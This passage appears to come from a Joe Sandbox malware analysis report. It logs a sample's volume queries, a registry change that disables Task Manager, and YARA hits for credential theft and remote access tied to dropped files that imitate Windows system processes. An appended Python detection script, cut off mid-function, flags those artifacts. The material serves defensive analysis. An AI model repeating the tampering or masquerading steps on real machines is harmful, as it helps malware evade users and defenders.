                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeQueries volume information: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe VolumeInformation
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeQueries volume information: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe VolumeInformation
                        Source: C:\Users\Default\Documents\sihost.exeQueries volume information: C:\Users\Default\Documents\sihost.exe VolumeInformation
                        Source: C:\Users\Default\Documents\sihost.exeQueries volume information: C:\Users\Default\Documents\sihost.exe VolumeInformation
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeQueries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe VolumeInformation
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_001FDF1E
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EB146 GetVersionExW,0_2_001EB146
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Windows\SysWOW64\reg.exe | Registry value created: DisableTaskMgr 1
                        Source: C:\Windows\SysWOW64\reg.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: ComComponentDriverInto.exe PID: 6892, type: MEMORYSTR
                        Source: Yara match | File source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara match | File source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara match | File source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED
                        Source: Yara match | File source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara match | File source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED

                        Remote Access Functionality

                        Source: Yara match | File source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: ComComponentDriverInto.exe PID: 6892, type: MEMORYSTR
                        Source: Yara match | File source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara match | File source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara match | File source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED
                        Source: Yara match | File source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara match | File source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara match | File source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED
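The two host artifacts a responder would sweep for first are the DisableTaskMgr policy value that reg.exe writes (Lowering of HIPS / PFW / Operating System Security Settings, above) and the dropped copies of sihost.exe and WmiPrvSE.exe that sit outside C:\Windows (the DROPPED Yara matches above and the "Files With System Process Name In Unsuspected Locations" Sigma hit). The following Python is an added example, not part of the Joe Sandbox report: it runs both checks over event lines written in the report's "Source: <process> | <event>" form and maps each hit to the ATT&CK technique the report's matrix uses. The event lines are constructed for the example, and the directory rule (anything under C:\Windows counts as a legitimate location for these image names) is a deliberate simplification.

```python
"""Host-artifact checks for the behaviour documented in this report.

Added example, not part of the Joe Sandbox report.  Input is a list of
event lines in the report's "Source: <process> | <event>" form.  The rule
that a genuine sihost.exe / WmiPrvSE.exe / SecurityHealthSystray.exe only
lives under C:\\Windows is an assumption made for the example.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Image names this sample's dropped files imitate (taken from the report's file list).
SYSTEM_IMAGE_NAMES = {"sihost.exe", "wmiprvse.exe", "securityhealthsystray.exe"}
WINDOWS_ROOT = PureWindowsPath(r"C:\Windows")

# Policy values that switch off built-in tooling; the report shows DisableTaskMgr.
LOCKDOWN_POLICY_VALUES = ("DisableTaskMgr",)

EVENT_RE = re.compile(r"^Source:\s*(?P<source>.*?)\s*\|\s*(?P<event>.*?)\s*$")
# A Windows path ending in .exe; non-greedy so trailing column text is not swallowed.
EXE_PATH_RE = re.compile(r"[A-Za-z]:\\[^|]*?\.exe\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK technique, named as in the report's matrix
    source: str      # process (or "Yara match") the event came from
    detail: str      # the registry value or path that triggered the finding


def is_under(path: PureWindowsPath, root: PureWindowsPath) -> bool:
    try:
        path.relative_to(root)
        return True
    except ValueError:
        return False


def masquerading_path(path_str: str):
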